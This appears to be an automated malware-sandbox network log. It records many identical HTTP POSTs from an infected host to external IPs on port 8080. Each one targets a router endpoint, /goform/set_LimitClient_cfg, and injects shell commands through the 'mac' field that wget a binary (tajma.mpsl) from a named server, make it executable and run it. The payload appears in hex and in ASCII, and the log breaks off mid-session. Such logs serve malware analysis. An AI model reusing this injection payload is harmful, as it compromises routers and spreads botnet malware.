                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.234808899.175.39.2488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303884983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.234104092.5.177.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303903103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.2360034204.239.90.1378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303973913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.2356692102.118.106.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304001093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.2356792141.11.218.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304038048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.2351708154.95.179.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304056883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.2360768198.218.70.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304076910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.235601220.36.250.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304094076 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.2346280128.240.155.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304121017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.2352026118.32.33.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304153919 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.234661453.214.217.2338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304179907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.2342764219.141.75.578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304205894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.2333798212.167.79.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304240942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.2348004185.174.224.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304646015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.235056012.175.248.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304671049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.2347540161.52.140.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304702044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.233603838.203.18.718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304740906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.235049235.24.139.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304760933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.2356274125.21.174.2248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304800034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.23464201.45.134.2418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304940939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.2343048206.246.187.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.304966927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.2360954122.201.227.2108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305038929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.233544651.140.229.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.305073023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
